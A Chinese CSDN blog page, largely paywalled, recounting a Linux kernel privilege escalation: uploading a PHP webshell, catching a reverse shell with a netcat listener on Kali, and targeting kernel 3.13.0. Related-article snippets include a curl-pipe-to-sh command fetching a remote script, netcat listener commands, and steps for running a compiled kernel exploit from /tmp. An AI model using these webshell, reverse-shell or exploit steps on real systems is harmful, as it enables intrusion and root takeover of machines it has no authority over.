linux内核提权

最新推荐文章于 2024-04-23 18:02:00 发布
最新推荐文章于 2024-04-23 18:02:00 发布
阅读量2.7k 收藏 9
点赞数 2
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kerun1/article/details/104092616
版权
本文记录了一次通过webshell获取Linux系统权限的过程。首先利用ma.php大马获取webshell,然后在Kali系统中使用nc监听并弹回shell。在确定内核版本为3.13.0后,搜索并利用相应exploit进行提权,最终成功获得root权限。
摘要由CSDN通过智能技术生成

记一次linux内核提权

首先要得到一个webshell传个大马上去。在这里插入图片描述
看到这里我已经传进去一个ma.php的大马,现在去访问它!
在这里插入图片描述
找到linux提权,开启kali系统,用nc弹个shell回来。

进入kali系统,输入nv -lvvp 12666等待连接。

输入kali系统的ip和端口。
在这里插入图片描述
点击开始链接后返回kali系统查看。
在这里插入图片描述
可以看到shell已经弹回来了,权限是www-data比较低的权限。

提权阶段

最低0.47元/天 解锁文章
夜里的游魂
关注
专栏目录
操作系统权限提升(十八)之Linux提权-内核提权
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-27 2872
内核提权是利用Linux内核的漏洞进行提权的,内核漏洞进行提权一般包括三个环节:1、对目标系统进行信息收集,获取到系统内核信息及版本信息;2、根据内核版本获取其对应的漏洞以及EXP3、使用找到的EXP对目标系统发起攻击,完成提权操作EXP该怎么着呢,可以用Kali去寻找,kali中自带searchsploit命令可以查找EXP,输入对应的版本号就可以查找相应的漏洞输入就会自动复制该文件到当前目录。
Linux内核提权
Elite的博客
07-11 531
内核提权是指通过利用操作系统内核中的漏洞或错误来获得超级用户权限或系统特权的行为
Linux权限
niqiu320的博客
05-24 1038
Linux提权大全 日站就要日个彻底。往往我们能拿下服务器的web服务,却被更新地比西方记者还快的管理员把内网渗透的种子扼杀在提权的萌芽里面。Linux系统的提权过程不止涉及到了漏洞,也涉及了很多系统配置。 Linux提权信息收集: 什么系统?什么版本? cat /etc/issue cat /etc/*-release cat /etc/lsb-release # Debian based cat /etc/redhat-release # Redhat based 什么内核?是64位吗?
Linux内核提权查询
f777x0的博客
05-15 887
https://www.kernel-exploits.com/
linux内核提权,Linux内核提权 CVE-2018-13405 分析
weixin_39915815的博客
04-29 243
author:OK5y@GearTeam距离上一次讲 Lua 程序逆向已经有一段时间了,这一次我们书接上回,继续开启Lua程序逆向系列之旅。在软件逆向工程实践中,为第三方文件编写文件格式分析器与指令反汇编器是一种常见的场景。这一篇的主要目的是,讲解如何为IDA Pro编写Luac的文件加载器,一方面强化对二进制文件格式的理解;另一方面,通过对IDA Pro进行扩展的插件式开发,更深入的领会IDA...
linux提权
weixin_43873557的博客
02-10 455
gcc编译exp要使用相对应版本的机器,然后再上传 sudo /bin/bash vim /etc/netplan/50 修改ens33 netplan apply 修改键盘 vim /etc/default/keyb curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh 01操作系统信息 ➢ 查看发行版本 cat
新版脏牛Linux内核提权漏洞CVE-2022-0847
03-09
5.8 <= Linux kernel 中的一个漏洞,它允许覆盖任意只读文件中的数据。这会导致权限提升,因为非特权进程可以将代码注入根进程。 修复版本:Linux 5.16.11、5.15.25 和 5.10.102 中修复。
CVE-2016-8655 Linux内核提权漏洞POC
11-18
CVE-2016-8655 Linux内核提权漏洞POC
Linux内核提权攻击研究.pdf
09-06
Linux内核提权攻击研究 Linux操作系统中,提权攻击是一种重要的攻击手段,针对Linux系统的安全性构成了严重的威胁。根据提权攻击所利用的漏洞类型,可以将其分为应用层提权攻击和内核提权攻击。内核提权攻击是指...
简单的linux提权收集的N多linux内核exp
03-12
拿到shell了,准备提权.先看下linux内核 2.6.18-194.11.3.el5 内核 2010的,这个好CentOS release 5.5好提 然后百度或者其它路径找EXP,2.6.18-194这个内核我已经收藏过.上传到/tmp,为什么要传到这个目录呢? 因为tmp目录可写可执行一般,继续ing. 找个外网IP 监听12666,当然12666也可以改。我这里用NC监听nc -l -n -v -p 12666 然后再点你shell 连接成功就出现下面的内容 然后我们进到/tmp目录 cd /tmp 进入到tmp目录了,看下我们之前上传的2.6.18-194 我这里有权限rwx,可读可写可执行.如果没有权限chmod -R 777 文件名 我这里的exp已编译过了,直接执行溢出就ok了 ./2.6.18-194 要是你的exp没有编译gcc -o /tmp/文件名 /tmp/文件名.c ,自己编译下就行了 成功了 其实linux提权还是很简单,关键看有没exp
针对Linux内核提权攻击防御方法的研究.pdf
09-06
《针对Linux内核提权攻击防御方法的研究》这篇论文深入探讨了如何防范Linux内核中的提权攻击。提权攻击是指攻击者利用系统漏洞,将用户态的权限提升至内核权限,从而能够执行任意代码,对系统造成严重威胁。文章重点...
Linux权限提升—内核、SUID、脏牛等提权
剁椒鱼头没剁椒的博客
04-02 3344
关于Linux系统提权的前置知识其实和Windows系统提权是一致的,只是在系统位置,由Windows系统更换为Linux系统而已。权限提升的本质就是通过低权限的账户转换为高权限账户,通过获取高权限账户去做想要做的事情。同时在内核提权提权的时候,需要注意有些内核漏洞需要使用到本地用户去提权,也就是非web权限,但是有些漏洞可以无视权限都可以进行提权,这一点需要注意。至于其它的命令使用方式,可以在给予的网站中去查找相关的使用方式,这里就不再进行演示了。漏洞信息:CVE-2016-5195漏洞。
内核提权姿势笔记
09-30 283
方法一: 通过寻找进程的thread_info结构,搜索匹配进程的cred结构,并修改其值获得root权限。thread_info(arch arm)结构如下: /* Linux/arch/arm/include/asm/thread_info.h*/ 20 #define THREAD_SIZE (PAGE_SIZE << THREAD_SIZE_ORDER)...
本地内核提权
一只web狗
07-01 1851
本地内核提权
LINUX提权内核漏洞提权
程序员阿飘 的博客
01-11 1623
在渗透过程中,有时利用某些漏洞可以获取一个低权限的用户,然后想办法提权,提升到root用户权限,从而控制整个系统。在获取到低权限shell后,通常会检查操作系统的发行版本、内核版本,老版本的系统可能会存在一些漏洞,于是我们可以利用这些版本漏洞进行提权。下面给大家带来的是一些内核提权的例子。今天简单向大家讲解了利用内核漏洞去进行提权的操作,可以发现内核漏洞最主要的就是信息获取后寻找对应的内核漏洞再去攻击,因为内核漏洞有很多所以就挑出了两个常见而且常用的来给大家演示一下,如果对本文感兴趣不妨一键三连。
Linux提权详解(一)
胖虎的博客
10-30 690
Linux提权方法和详解
linux系统提权
weixin_53639243的博客
04-23 1031
uname -a 显示全部系统信息cat /etc/issue 内核信息。此命令也适用于所有的Linux发行版cat /etc/passwd 所有人都可看//aux都是参数a = show processes for all users 显示所有用户的进程u = display the process's user/owner 显示用户x = also show processes not attached to a terminal 显示无控制终端的进程。
基于大模型技术的算力产业监测服务平台设计
最新发布
09-17
内容概要:本文提出了一种新型算力产业监测服务平台的设计理念,运用国内自主研发的大模型技术支持,通过对传统技术的改进和完善,提出了三层架构的设计方法,即基础设施层(含向量数据库和模型训练)、大模型应用框架层(强化数据处理与多维关系挖掘)及业务层(如智能分析助手)。这种设计方案旨在提高算力产业发展监测与决策制定的质量。 适合人群:电信行业的从业人员及研究人员;算力产业链各环节管理者;政府相关机构和政策决策者。 使用场景及目标:在多种算力相关的应用场景(如云计算中心管理,数据中心监测,政策分析)中辅助决策者进行快速有效的信息获取和技术选择;助力算力产业发展方向的精确把控和战略调整。 其他说明:随着大模型技术的日臻成熟,该算力产业监测服务平台预计将进一步丰富自身的应用领域和服务深度,以促进算力行业更智慧化发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值